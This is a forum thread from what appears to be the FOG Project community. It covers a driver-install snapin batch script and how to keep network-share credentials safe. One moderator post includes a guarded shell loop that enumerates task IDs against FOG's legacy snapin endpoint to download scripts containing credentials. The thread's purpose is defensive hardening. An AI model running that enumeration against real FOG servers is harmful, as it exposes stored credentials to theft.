Snapin script interrupted by Hostname Changer before completion (I think)


  • Testers

    Hi Everyone,
    I am just starting to play around with snapins. I have a situation where pre-installing a video driver on an image causes it to fail during sysprep when deployed. I figured, why not try a snapin to install it silently after sysprep? The most efficient way I could think of was to write a short batch file that references the installer on a network share, temporarily mapped for the install and then removed. See below:

    @echo off
    
    pushd \\homead\tech\bpi\nvidia
    
    setup.exe -s
    
    popd
    

    When I run the snapin from the FOG GUI on an already imaged host, it works flawlessly: it installs silently and reboots. However, when I register a host, associate a snapin and image, and choose to image it that way, it does not work. In the snapin log for the host post-imaging, it says it completed in 30 seconds and returned code 0. I reckon that’s not enough time to install a full video driver. My theory is that the snapin is being run pre-hostname change and gets interrupted by the changing of the hostname and joining the domain. I’m no scripting expert, but I tried to force the batch file to “wait” until the install was done:

    @echo off
    
    pushd \\homead\tech\bpi\nvidia
    
    start /wait setup.exe -s
    
    popd
    

    Alas, it still “finishes” in thirty seconds and fails to install it before the hostname is changed. Please feel free to point out any glaring mistakes, I won’t take it personally :)

    As always, thanks in advance for your help.

    Paul


  • Testers

    @Wayne-Workman I am not in the business of hacking FOG either. But as I work in healthcare and we are a small shop, one of my many hats is security, and with PHI concerns I think about all possible attack surfaces. We have regular audits of our security and have to justify anything of a questionable nature. Right now I am working on closing up a few other areas, and I have been thinking of ways to harden software deployment through snapins. Currently we have a separate VLAN for FOG and only deploy snapins at time of imaging, then remove the log and use the client basically just for user tracking and rebooting. I will push small single-file snapins if I need to, but nothing that needs to connect to a share, due to not having a good way to do so. I love FOG and it works great; I just like to include my thoughts on things to help further FOG and keep it as secure as possible along the way.

    FOG 2.0 will be a huge advancement again, I am sure, just like 1.3 is truly leaps and bounds better than .3x was. I thought .3x was great, but the issues were definitely addressed. With all software there are always compromises to maintain backwards compatibility for longer than any @Developers would really want to. In my opinion 1.3 is not just a decimal increment from 1.2; it is much closer to a 2.0 version. But with the true 2.0 they can finally drop support for the legacy client and partimage, and it sounds like they will move away from PHP. It will definitely be a more robust and modern system.


  • Moderator

    @ITSolutions said in Snapin script interrupted by Hostname Changer before completion (I think):

    But they can still be intercepted using @Wayne-Workman’s example of scanning tasks with MACs, as the information is still transmitted and read by the client.

    Ah, I didn’t even think about that, even when I was looking at the plain-text snapin arguments in a web browser using the GET method below. But I’m positive a determined hacker would have thought about it. I’m not in the business of trying to hack FOG; the things I said below were just passing thoughts, no real effort was put in.

    I think what I was looking at though was for Legacy Client compatibility. The New FOG Client gets its snapin info via encrypted communication as @jbob said earlier.

    So… I guess we need a way to disable legacy client support should someone want that, and again @jbob is two steps ahead and already mentioned it.


  • Testers

    @Wayne-Workman and @Jbob I fully agree that you should never use plain-text passwords, very bad idea! Like I was saying, the randomized password script I was thinking about was to work around limitations within FOG at the time, including now for that matter. If the password changed periodically, the attack window would be minimized: if someone did get the password, it would expire at the next change and no longer be good. This would also eliminate the human error of “random” passwords; all random passwords chosen by humans are bad, and mostly predictable over time.

    @Jbob That would be great and make it much more secure; if we could hide the snapin details in the log, we could negate plaintext passwords altogether. But they can still be intercepted using @Wayne-Workman’s example of scanning tasks with MACs, as the information is still transmitted and read by the client.

    The other thought I had in regards to the client being able to support this type of thing is if we could have the option to map a network share through the snapin management. Have a check box for “map network share and use that location”, then have a configurable share location in the database. The client would map the share, launch the snapin, perform the task, and disconnect when finished.

    As for simplicity, hiding the details would be easier and less prone to bugs. But a configurable default share with a check box would be a quicker way of reusing a share for multiple snapins over time.

    The problem is that anything is hackable given the determination of the attacker. The question is how much effort do they need to put in and how much convenience do you give up? Not trying to be negative about it, but it is what keeps us in jobs. I enjoy the discussion and am glad that we can discuss the ideas/issues/solutions we have to make FOG a better and more secure system.



  • @Wayne-Workman Thank you for clarifying this for me!


  • Moderator

    @michael_f That’s the idea, and if this can be removed from the fog logs as @jbob said, it’d be pretty legit.



  • @Jbob That would mean I could securely put my arguments here:
    0_1463426663678_snapin.png

    and in the script I connect my share like

    net use \\share\folder  /user:%1 %2 
    

    That would be a great feature!


  • Moderator

    @Jbob said in Snapin script interrupted by Hostname Changer before completion (I think):

    Another option:
    Bake in your user share password into some SYSTEM read-only file on your image and make your batch script read it for the credentials.

    Even then, the NFS shares are readable by anyone, and one could restore the image to a Linux directory via CLI and then browse to the files.

    I would urge everyone to stay away from clear-text passwords.


  • Senior Developer

    @ITSolutions just throwing my 2 cents in here. Do not use a plain-text password hard-coded into a file. In the next version of the client we could easily add a checkbox to snapins: “Hide snapin details in fog.log”. With that you could make the password a parameter to the batch script. For example:

    RunWith: cmd.exe
    RunWithArgs: /c
    File: MyBatchScript.cmd
    Args: MyPassword
    

    Snapin configuration is transmitted over a secure medium, whereas the file itself is obtained via a simple HTTP download; a sha512 is then generated and compared against a securely transmitted checksum to ensure integrity. Now if you really wanted to be secure you’d also need to disable the legacy client support, as a potential attack vector would be to make the legacy client API calls before the new client has a chance to grab the snapin information, thereby giving it in plain text. I’m not sure if we have such a checkbox to disable the legacy client yet, so pinging @Tom-Elliott.
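    The download-then-verify step described above can be sketched in shell. This is illustrative only, not the client’s actual code (the new client is a Windows service); the function name and paths are made up for the example.

```shell
#!/usr/bin/env bash
# Sketch of the integrity check: the checksum arrives over the encrypted
# channel, the file over plain HTTP, and the two are compared before the
# snapin is allowed to run.

# verify_sha512 FILE EXPECTED_HASH -> exit 0 only if FILE's sha512 matches
verify_sha512() {
    local actual
    actual=$(sha512sum "$1" | awk '{print $1}')
    [ "$actual" = "$2" ]
}

# Hypothetical usage (URL and variable are placeholders):
# curl -fso snapin.bin "http://fogserver/fog/service/snapins.file.php?..."
# verify_sha512 snapin.bin "$EXPECTED" || { echo "checksum mismatch" >&2; exit 1; }
```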

    Another option:
    Bake in your user share password into some SYSTEM read-only file on your image and make your batch script read it for the credentials.


  • Moderator

    @michael_f said in Snapin script interrupted by Hostname Changer before completion (I think):

    @ITSolutions I am using network shares too, and agree with you that deleting the connection at the end and using a restricted account is quite a good idea.

    But I still can’t see the security risk in putting the credentials in the script:
    The script is stored on the fog server, which should be secure.
    AFAIK it is sent to the client encrypted if using the new fog client.
    On the client side the script is executed with system privileges, so a user who happens to be logged in can’t access the script? Or is the script saved readable in a temporary file?
    If the credentials are sent encrypted to the server by the “net use” command (which I assume), how can somebody get access to the credentials?

    Maybe I got something wrong? I would really appreciate it if someone could clarify this.

    It wouldn’t be difficult to snatch the script with the clear-text passwords in it from the server. It would be a matter of having a MAC (or list of MACs) from your environment (easy), finding the FOG server’s IP (easy), and then writing a basic script to guess at the task ID. Then it’s just a matter of iterating through a most-probable range of task IDs and through a single or large list of MACs with GET requests… like this one:
    http://10.2.1.11/fog/service/snapins.file.php?mac=90:B1:1C:98:03:8C||00:00:00:00:00:00:00:E0&taskid=3274

    The most-probable range of task IDs is easy to determine by looking at any c:\fog.log file. Even if you couldn’t access the log to determine a most-probable range of task IDs, you could just iterate through 5,000 of them and likely hit the valid one. Once a valid one is hit, the snapin download starts. An attacker wouldn’t even need to know the task’s name or any associated files names.
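    The iteration described above amounts to a very short shell loop. The IP and MAC below are just the example values from this post, and the scan itself is guarded behind an environment variable so nothing runs by default; it is here only to show how little effort the legacy GET endpoint requires.

```shell
#!/usr/bin/env bash
# Sketch of the task-ID enumeration described in the post.

# snapin_url SERVER MAC TASKID -> print the legacy-client download URL
snapin_url() {
    printf 'http://%s/fog/service/snapins.file.php?mac=%s&taskid=%s\n' "$1" "$2" "$3"
}

# Guarded: set RUN_SCAN=1 to actually iterate (do this only on your own lab gear).
if [ "${RUN_SCAN:-0}" = 1 ]; then
    for taskid in $(seq 1 5000); do
        # curl -f fails silently on HTTP errors, so success means a live task
        if curl -fso "snapin-$taskid.bin" "$(snapin_url 10.2.1.11 '90:B1:1C:98:03:8C' "$taskid")"; then
            echo "valid taskid: $taskid"
            break
        fi
    done
fi
```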

    Plain-Text passwords are never secure.


  • Testers

    @michael_f With the new client you are right about it being encrypted in transit. But the snapins are transferred to the client and stored in a temp folder under the FOG install location (C:\Program Files (x86)\FOG\tmp) before being executed, and this would be the script with the credentials. The file with the credentials could end up remaining on the client for various reasons, such as the client getting the snapin and being immediately shut down, or the service being stopped before the temp files are removed. Also, given that it is saved on the client, it is possible to recover the data using file-recovery tools even after deletion.

    I had come up with the idea of the random password with the old client, as it sent everything in plain text over the network. But as I didn’t have time, I never got around to working on it. Now with the new client it is less likely that someone gets the snapin file, but still very possible. It all depends on the level of security you need/want for the distribution share. If you keep the share locked down, with little or no information other than program files that can be installed, the risk is very minimal. That is where I am now; it doesn’t seem to be worth the effort. Security vs. convenience, there will always be a trade-off.

    I know I am going way off into the extremely cautious and almost tin-foil-hat security concerns, but these are just thoughts for if you really want to ensure that passwords are truly secure.



  • @ITSolutions I am using network shares too, and agree with you that deleting the connection at the end and using a restricted account is quite a good idea.

    But I still can’t see the security risk in putting the credentials in the script:
    The script is stored on the fog server, which should be secure.
    AFAIK it is sent to the client encrypted if using the new fog client.
    On the client side the script is executed with system privileges, so a user who happens to be logged in can’t access the script? Or is the script saved readable in a temporary file?
    If the credentials are sent encrypted to the server by the “net use” command (which I assume), how can somebody get access to the credentials?

    Maybe I got something wrong? I would really appreciate it if someone could clarify this.


  • Testers

    @michael_f Yeah, I would use net use in the script. With the new FOG client it is a little more secure since it uses certs, but the script does still have the credentials in it. When I used it, I would create a very restricted account to access the share, then remove the mapping at the end of the script. This was basically security by obscurity, but I felt it was better than a fully open share that a simple scan could find and have access to.

    An idea I had, but have never had time to explore, is creating a bash script to update the password for a share at set or random intervals:

    On the FOG server, install Samba.
    Create a user “snapin user” with whatever rights you need (probably read-only, but could be write if needed).
    Create a bash script to randomly generate a password, set it for “snapin user”, and also update a net use script in the snapin dir with the new password.

    Then you would use that script to push out as a snapin and just pass the net use script what file to run on the share. So it would be:
    Run with: CMD.exe
    Snapin: Net Use script
    Arguments: “mapped drive”\Install_programx

    It is complicated, but if you really need the security, it can work to avoid having unchanging credentials passed to your PCs.
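    A minimal sketch of that rotation script, run on the FOG server. The account name, share name, and script path are assumptions for illustration, not FOG defaults; you would hook this into cron at whatever interval you want.

```shell
#!/usr/bin/env bash
# Rotate the password of a restricted Samba account and regenerate the
# "net use" batch script that snapins call, so clients always get the
# current credential. Names/paths below are hypothetical.
set -u

SNAPIN_USER="snapinuser"          # hypothetical restricted Samba account
NETUSE_SCRIPT="/tmp/netuse.cmd"   # would really live in your snapin dir

# 20 random characters from a cmd-safe set
PW=$(tr -dc 'A-Za-z0-9' < /dev/urandom | head -c 20)

# Update the Samba account (guarded: needs root and smbpasswd installed)
if command -v smbpasswd >/dev/null 2>&1 && [ "$(id -u)" -eq 0 ]; then
    printf '%s\n%s\n' "$PW" "$PW" | smbpasswd -s "$SNAPIN_USER"
fi

# Regenerate the batch script the clients run: map, execute %1, unmap
cat > "$NETUSE_SCRIPT" <<EOF
@echo off
net use \\\\fogserver\\snapins /user:$SNAPIN_USER $PW
call \\\\fogserver\\snapins\\%1
net use \\\\fogserver\\snapins /delete
EOF
```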



  • @ITSolutions said in Snapin script interrupted by Hostname Changer before completion (I think):

    … my other example of passing credentials via a snapin is not the best security practice by any means.

    @ITSolutions That’s interesting, could you please elaborate on this a bit? Does the “net use” command send passwords in plain text?


  • Testers

    @fry_p There are reasons for every way of doing things. Having an open share is a big security risk, and my other example of passing credentials via a snapin is not the best security practice by any means. I just wanted to give the other options that others may find useful. So in terms of security, your solution is the best choice.

    Model-specific is great: quicker deployments since sysprep is not needed, and easier to manage in many ways. When I worked in the schools, I wish we could have gotten to that point, but part of our issue was that I was at an ISD and we supported the technology that each school chose. With 18 districts you ended up with everything under the sun. Now I am in a small community health care org and we have model-specific images for the 10 models we currently have, and are narrowing down to even less of a mix.


  • Testers

    @ITSolutions I suppose my method is a band-aid fix of sorts. At my place of work, we are moving to standardize the models of PCs we are putting in. By the time next school year starts, about 75% of all the PCs on the network will be Dell OptiPlex 5040s. Ultimately, we are going the model-specific route for images since we only have a handful of models we use. I agree with what you are saying though.


  • Testers

    @fry_p I also like to use shares because of the updating issue. If that driver ever needs updating, you need to update the image; on a share you just replace the file. I have a small Samba share on my FOG server that has installers and scripts that I use just for deployment. You just need to make sure there is no sensitive info on that share. I have also set up a site where every script that is pushed through FOG maps a drive with a UN/password in the script before executing the installer. Not the best, but safer than an open share.


  • Moderator

    @fry_p Putting the files on the image is one solution - but for people making universal images, shares are a good solution.


  • Testers

    @Jbob @ITSolutions I figured out what it was. Jbob was right on the money. I didn’t have anonymous authentication permissions on the share it was on. I ran the script manually and it threw an authentication (bad UN/PW) error. Then I had a thought: why use a share in the first place? I can just put the driver installation files in the image and use the batch file to point at them after imaging! I was over-complicating it, really. I am trying this method now. Will keep you posted.


  • Testers

    This sounds to me like it is a self-extracting exe that kicks off an MSI after the exe finishes extracting. So the script waits, but when the exe is done it continues; the problem is that the MSI (the actual driver install) is still running. You may be able to use 7-Zip to extract the exe, then find the MSI installer and run it silently instead. I have had to do that for many driver installs.
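    The extract-and-find step might look something like this sketch (shown in shell using p7zip; on the Windows client you would do the equivalent with 7z.exe and then run the found MSI with msiexec). The file names are illustrative.

```shell
#!/usr/bin/env bash
# Extract a self-extracting setup.exe and locate the MSI inside it.
# On Windows, the found MSI would then be installed silently with:
#   msiexec /i <found.msi> /qn /norestart
set -u

# Find any MSI files under an extraction directory
find_msi() {
    find "$1" -type f -iname '*.msi'
}

# Guarded: only runs where 7-Zip and a setup.exe are actually present
if command -v 7z >/dev/null 2>&1 && [ -f setup.exe ]; then
    7z x -oextracted setup.exe
    find_msi extracted
fi
```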

    @michael_f gave a good suggestion if you don’t need anything more than the driver itself, but if you need the Nvidia software also, then my suggestion may be a better option. I know some video cards are picky if they don’t have their entire package installed.

